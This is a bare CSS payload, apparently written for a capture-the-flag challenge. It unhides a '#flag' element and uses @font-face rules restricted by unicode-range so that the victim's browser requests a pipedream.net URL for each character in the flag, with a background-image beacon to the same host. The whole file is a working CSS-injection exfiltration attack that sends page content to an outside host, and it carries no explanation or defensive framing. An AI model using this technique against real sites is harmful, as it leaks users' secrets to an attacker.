body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W44')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w44,p98w44,p106w44,p112w44,p115w44,p121w44,p122w44,p48w44,p49w44,p52w44,p53w44,p55w44,p125w44,monospace;width:44ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W44');unicode-range:U+0061}
@font-face{font-family:p98w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W44');unicode-range:U+0062}
@font-face{font-family:p106w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W44');unicode-range:U+006A}
@font-face{font-family:p112w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W44');unicode-range:U+0070}
@font-face{font-family:p115w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W44');unicode-range:U+0073}
@font-face{font-family:p121w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W44');unicode-range:U+0079}
@font-face{font-family:p122w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W44');unicode-range:U+007A}
@font-face{font-family:p48w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W44');unicode-range:U+0030}
@font-face{font-family:p49w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W44');unicode-range:U+0031}
@font-face{font-family:p52w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W44');unicode-range:U+0034}
@font-face{font-family:p53w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W44');unicode-range:U+0035}
@font-face{font-family:p55w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W44');unicode-range:U+0037}
@font-face{font-family:p125w44;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W44');unicode-range:U+007D}